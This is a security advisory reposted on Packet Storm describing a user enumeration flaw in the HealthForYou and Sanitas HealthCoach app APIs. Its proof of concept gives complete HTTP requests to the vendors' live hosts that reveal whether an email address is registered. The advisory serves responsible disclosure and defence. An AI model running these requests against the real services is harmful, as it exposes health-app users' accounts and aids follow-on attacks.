exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

HealthForYou 1.11.1 / HealthCoach 2.9.2 User Enumeration

HealthForYou 1.11.1 / HealthCoach 2.9.2 User Enumeration
Posted Jun 4, 2021
Authored by Nick Decker | Site trovent.io

HealthForYou version 1.11.1 and HealthCoach version 2.9.2 suffer from a user enumeration vulnerability.

tags | exploit
SHA-256 | 42f3483603f56524c0a83a32c43ca70dcb2416daaa8123abc8aa7afb35f560fe

HealthForYou 1.11.1 / HealthCoach 2.9.2 User Enumeration

Change Mirror Download
# Trovent Security Advisory 2104-01 #
#####################################


User enumeration through API
############################


Overview
########

Advisory ID: TRSA-2104-01
Advisory version: 1.0
Advisory status: Public
Advisory URL: https://trovent.io/security-advisory-2104-01
Affected product: HealthForYou & Sanitas HealthCoach mobile and web applications
Tested versions: HealthForYou 1.11.1 (com.hansdinslage.connect.HealthForYou),
HealthCoach 2.9.2 (de.sanitas_online.healthcoach)
Vendor: Hans Dinslage GmbH (subsidiary of Beurer GmbH https://www.beurer.com)
Credits: Trovent Security GmbH, Nick Decker


Detailed description
####################

Trovent Security GmbH discovered a vulnerability in the server API of
the mobile apps Sanitas HealthCoach and HealthForYou.
The API call "/BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=" allows
to easily enumerate registered usernames and email addresses.
This knowledge could aid an attacker with further exploits as
demonstrated by TRSA-2104-02.

Severity: Medium
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)
CWE ID: CWE-203
CVE ID: N/A


Proof of concept
################

HealthForYou
############

Sample request to check if my colleague's email address is registered:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


GET /BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=s.pietsch@trovent.io HTTP/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
Host: sync.healthforyou-lidl.com
Connection: close
Content-Length: 0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RESPONSE:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 4
etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"
date: Wed, 28 Apr 2021 11:25:24 GMT
x-envoy-upstream-service-time: 118
server: istio-envoy
connection: close

true


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



HealthCoach
###########

Sample request to check if my colleague's email address is registered:

REQUEST:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


GET /BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=s.pietsch@trovent.io HTTP/1.1
Content-Type: application/json; charset=UTF-8
Accept-Encoding: gzip, deflate
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)
Host: sync.connect-sanitas-online.de
Connection: close
Content-Length: 0


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

RESPONSE:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


HTTP/1.1 200 OK
x-frame-options: SAMEORIGIN
x-xss-protection: 1; mode=block
content-type: application/json; charset=utf-8
content-length: 4
etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"
date: Wed, 28 Apr 2021 11:34:02 GMT
x-envoy-upstream-service-time: 78
server: istio-envoy
connection: close

true


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


Solution / Workaround
#####################

To mitigate this vulnerability, we recommend to disable this API call.
In general it is recommended to prevent attackers from enumerating valid usernames.


History
#######

2021-04-27: Vulnerability found
2021-04-28: Advisory created, vendor and BSI contacted
2021-04-30: Vendor acknowledged the vulnerability to Trovent and BSI
2021-06-04: Advisory published
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    18 Files
  • 19
    Nov 19th
    7 Files
  • 20
    Nov 20th
    13 Files
  • 21
    Nov 21st
    6 Files
  • 22
    Nov 22nd
    48 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    60 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    44 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close